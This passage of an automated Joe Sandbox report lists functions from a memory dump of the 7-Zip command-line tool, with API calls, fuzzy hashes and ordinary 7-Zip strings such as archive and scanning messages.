                                                                                                                                        • Opcode Fuzzy Hash: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                                                                                                                        • Instruction Fuzzy Hash: 22017125263904DAEB08FF21E8493A82330E795745FD09423EA0D876B5DF38C9A5CB82
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryRemovefree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 736856642-0
                                                                                                                                        • Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                        • Instruction ID: 3d1c26cbae34e39be183e6d08f7b63cebb8584860547a5df2c1118a946efbac8
                                                                                                                                        • Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                        • Instruction Fuzzy Hash: F4F0A93622464181DA349F21D95833D53649BC77F4F484321EEAD477A9CF65C9AACB01
                                                                                                                                        APIs
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00242F5B
                                                                                                                                          • Part of subcall function 00242130: malloc.MSVCRT ref: 00242134
                                                                                                                                          • Part of subcall function 00242130: _CxxThrowException.MSVCRT ref: 0024214F
                                                                                                                                        • memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,0024302B,?,?,?,?,00243698), ref: 00242F2C
                                                                                                                                        • free.MSVCRT ref: 00242F34
                                                                                                                                        Strings
                                                                                                                                        • Unsupported switch postfix -stm, xrefs: 00242EF6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                        • String ID: Unsupported switch postfix -stm
                                                                                                                                        • API String ID: 3321538808-3553869907
                                                                                                                                        • Opcode ID: 782ce923791997833d0ba5642722b99d9d0d4bfd2dac9aa70fed07e4ae7eb04f
                                                                                                                                        • Instruction ID: 4f61c72214a45f23bbe89088934c3a67215d325676ee47544c78cc94af1b4ce6
                                                                                                                                        • Opcode Fuzzy Hash: 782ce923791997833d0ba5642722b99d9d0d4bfd2dac9aa70fed07e4ae7eb04f
                                                                                                                                        • Instruction Fuzzy Hash: 2FF0C27A71128486DB289F46E48026DB361EB857D0F548060AB8D07B11CE39D4AACB01
                                                                                                                                        APIs
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00242AFD
                                                                                                                                          • Part of subcall function 00242130: malloc.MSVCRT ref: 00242134
                                                                                                                                          • Part of subcall function 00242130: _CxxThrowException.MSVCRT ref: 0024214F
                                                                                                                                        • memmove.MSVCRT ref: 00242ACE
                                                                                                                                        • free.MSVCRT ref: 00242AD6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                        • String ID: (LP-
                                                                                                                                        • API String ID: 3321538808-3833670221
                                                                                                                                        • Opcode ID: 922fd8344d48b7d63873bb69e241c3b9bd4b93ea6b889d557fcb432bfeef3903
                                                                                                                                        • Instruction ID: b99487c983ed33ff871113404bea02e3659ccbc8df053a6447947435709852c5
                                                                                                                                        • Opcode Fuzzy Hash: 922fd8344d48b7d63873bb69e241c3b9bd4b93ea6b889d557fcb432bfeef3903
                                                                                                                                        • Instruction Fuzzy Hash: 94F0F076311254C6DB28EF4BE88065DB361E7847D4F54C020EF8D03710DE38C8AACB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$fputcfree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3819637083-0
                                                                                                                                        • Opcode ID: cb788c44dfa0eaada90149aae3a18cff9b2e941fef6e7d72ec798f7d4b9bb75c
                                                                                                                                        • Instruction ID: 8cbfbd495af891c0d3630f61e362f0595d2e57b45169e7587e301362329b469c
                                                                                                                                        • Opcode Fuzzy Hash: cb788c44dfa0eaada90149aae3a18cff9b2e941fef6e7d72ec798f7d4b9bb75c
                                                                                                                                        • Instruction Fuzzy Hash: 85F0686631194081DA20EF26E9443596330BB99BF5F449331EEAE037E4DE3CC54AC700
                                                                                                                                        APIs
                                                                                                                                        • memmove.MSVCRT ref: 00283E51
                                                                                                                                          • Part of subcall function 00282B60: CompareFileTime.KERNEL32(?,?,?,00000000,00283E64), ref: 00282BA5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CompareFileTimememmove
                                                                                                                                        • String ID: alternate streams$files$streams
                                                                                                                                        • API String ID: 1303509325-806849385
                                                                                                                                        • Opcode ID: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                        • Instruction ID: 55c19943f506bb2ac14dde69d861dfd1cacdbf396268725d749737ba401283ed
                                                                                                                                        • Opcode Fuzzy Hash: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                        • Instruction Fuzzy Hash: F9F06256321569A2EB24FB26D505B996361FB45FD8FC09013AA0C07E959F38C3AACB00
                                                                                                                                        APIs
                                                                                                                                        • FormatMessageW.KERNEL32 ref: 00246676
                                                                                                                                          • Part of subcall function 0024339C: free.MSVCRT ref: 002433D7
                                                                                                                                          • Part of subcall function 0024339C: memmove.MSVCRT(00000000,?,?,00000000,002410A8), ref: 002433F2
                                                                                                                                        • LocalFree.KERNEL32 ref: 00246698
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FormatFreeLocalMessagefreememmove
                                                                                                                                        • String ID: Error #
                                                                                                                                        • API String ID: 2451246624-1299485822
                                                                                                                                        • Opcode ID: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                        • Instruction ID: 99d113e798edd66ea6f462261cef1eff8c8c11d419715d65e418ce62af274fe6
                                                                                                                                        • Opcode Fuzzy Hash: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                        • Instruction Fuzzy Hash: D621443223468186CB68CF15E04879DB7B5F7C6BA4F888222DA8847794DFBCC598CB11
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: UNC
                                                                                                                                        • API String ID: 0-337201128
                                                                                                                                        • Opcode ID: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                        • Instruction ID: fa98262280f5cd30e55af0f641d4a114efad6c000484a1c8f06e77ccd228657a
                                                                                                                                        • Opcode Fuzzy Hash: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                        • Instruction Fuzzy Hash: 3E21DF3A360AA6C2EF38EF56D4A4B682360E744B84F149027CF4947720EF39CCA9D700
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 00280661
                                                                                                                                        • free.MSVCRT ref: 00280680
                                                                                                                                          • Part of subcall function 0028B1C8: memset.MSVCRT ref: 0028B20D
                                                                                                                                          • Part of subcall function 0028B1C8: fputs.MSVCRT ref: 0028B232
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$freememset
                                                                                                                                        • String ID: ERROR:
                                                                                                                                        • API String ID: 2276422817-977468659
                                                                                                                                        • Opcode ID: 9885eecbbf6ca8fc6e066b44c4d0d806fd7fb2900e3a304f7a56ab35e13a5ef5
                                                                                                                                        • Instruction ID: 179148ebedfd7db0bd78d26a5b39cab47d413e44c5a4b6754a5604e48634d95e
                                                                                                                                        • Opcode Fuzzy Hash: 9885eecbbf6ca8fc6e066b44c4d0d806fd7fb2900e3a304f7a56ab35e13a5ef5
                                                                                                                                        • Instruction Fuzzy Hash: 5A11B61272164181CA28FF23E95536E6320FB85BD4F484625FE6F47795DF2CC469C740
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0024B4AA
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0024B4F8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue
                                                                                                                                        • String ID: Path64
                                                                                                                                        • API String ID: 3660427363-321863482
                                                                                                                                        • Opcode ID: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                        • Instruction ID: 2fe301535a612e4ec95cd5ce979c3b969d60add69e57ecac9a55b2271f652f4c
                                                                                                                                        • Opcode Fuzzy Hash: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                        • Instruction Fuzzy Hash: 1C214C77A15641C7EB14CF25E45472EB7A0F794B84F60912AEB8907BA8DB3CC895CF40
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • Can not open the file as archive, xrefs: 002842D8
                                                                                                                                        • Can not open encrypted archive. Wrong password?, xrefs: 00284297
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs
                                                                                                                                        • String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
                                                                                                                                        • API String ID: 1795875747-2399861261
                                                                                                                                        • Opcode ID: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                                                                                                                        • Instruction ID: c8744561c3d0411f1bad7a95334975bc249198aed8dfd835509cfb6831541e15
                                                                                                                                        • Opcode Fuzzy Hash: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                                                                                                                        • Instruction Fuzzy Hash: D4018FAA73165693EE18FF2BE8543591321AB45FD4F949032EE0A47389DE28C4A9CB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wcscmp
                                                                                                                                        • String ID: \??\
                                                                                                                                        • API String ID: 3392835482-3047946824
                                                                                                                                        • Opcode ID: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                        • Instruction ID: e3ae63c4fe0e4fe6800922bc6774803f12ab722f5f5ba5ee19e813ae5593e53c
                                                                                                                                        • Opcode Fuzzy Hash: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                        • Instruction Fuzzy Hash: A8F09066321584D6CE18DF2AEAA432D2321FB84B99F909432CB4A47A14DF64C4FBC320
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 00282011
                                                                                                                                          • Part of subcall function 00242300: fputc.MSVCRT ref: 00242311
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputcfputs
                                                                                                                                        • String ID: Scan$Scanning
                                                                                                                                        • API String ID: 269475090-1436252306
                                                                                                                                        • Opcode ID: ffb3ed3a4ca004d2504b304dc7fbd21c8946e14a3d26513a036a6eb6b827f317
                                                                                                                                        • Instruction ID: 334744445bf3cd530ee35d4c527c37aecbf0f517e921423afefae9027454f4ee
                                                                                                                                        • Opcode Fuzzy Hash: ffb3ed3a4ca004d2504b304dc7fbd21c8946e14a3d26513a036a6eb6b827f317
                                                                                                                                        • Instruction Fuzzy Hash: 71F0B476712982D1DB05EF25C9493682361E754B88F9881229B0D4B2A4DF28C5EAC310
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocExceptionStringThrow
                                                                                                                                        • String ID: out of memory
                                                                                                                                        • API String ID: 3773818493-2599737071
                                                                                                                                        • Opcode ID: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                        • Instruction ID: 2296206240e299d13b45be16107629f5df1b689c7ac56ee0ffda442d1013293f
                                                                                                                                        • Opcode Fuzzy Hash: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                        • Instruction Fuzzy Hash: 54F01C66312B8592DB089B15EA897186370EB89784F64C425DB5807B28EF79C8A9C701
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 0028B7E4
                                                                                                                                          • Part of subcall function 00242300: fputc.MSVCRT ref: 00242311
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputcfputs
                                                                                                                                        • String ID: Scan $Scanning the drive:
                                                                                                                                        • API String ID: 269475090-1085461122
                                                                                                                                        • Opcode ID: 4a104878c2e5f0d323a3430e672efaa3bd5f76afab79e0bd6a72b63798dffa16
                                                                                                                                        • Instruction ID: 27e14a003a49c71760d5b59312e56c84936b984d1ca3311f2452b3496dd9fbd1
                                                                                                                                        • Opcode Fuzzy Hash: 4a104878c2e5f0d323a3430e672efaa3bd5f76afab79e0bd6a72b63798dffa16
                                                                                                                                        • Instruction Fuzzy Hash: 99E0866A722D8281CE05DF2ADA8939C1335AB84BE5F959422AE0D47664EF18C5AAC700
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 0026ECEE
                                                                                                                                        • free.MSVCRT ref: 0026ECF6
                                                                                                                                        • free.MSVCRT ref: 0026EFE3
                                                                                                                                        • free.MSVCRT ref: 0026EFEB
                                                                                                                                          • Part of subcall function 00244D78: free.MSVCRT ref: 00244DBC
                                                                                                                                          • Part of subcall function 00244D78: free.MSVCRT ref: 00244DC4
                                                                                                                                          • Part of subcall function 00244D78: free.MSVCRT ref: 00244EAC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                                                                                        • Instruction ID: 7619bdcb4b1c0ee7ff666e866e0043ee796baff2c4985f8c608e7a9621cde86f
                                                                                                                                        • Opcode Fuzzy Hash: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                                                                                        • Instruction Fuzzy Hash: 39A1DF36324B82D6CF24DF26D1843AE7760F794B90F054126EF9A47BA5EB79C8A4C700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                        • Instruction ID: 6412a3f0eb5d056571c858e4ae8fe83e913b1e4fa93dd51041a16e53e333ff8b
                                                                                                                                        • Opcode Fuzzy Hash: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                        • Instruction Fuzzy Hash: 1E41C933224E9197CB18EF22E48002DB761F781FD8B544111EB9A2776ADB74C8B6CF01
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                        • Instruction ID: 0fd307fb724ab40181aa260b0206a2b083af123eb3c5aded699136b387cb0598
                                                                                                                                        • Opcode Fuzzy Hash: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                        • Instruction Fuzzy Hash: A64182665286C2C5CB79CF21A050AEBBBB5F385784F45D006DACD53B1ACE39C8A88B41
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
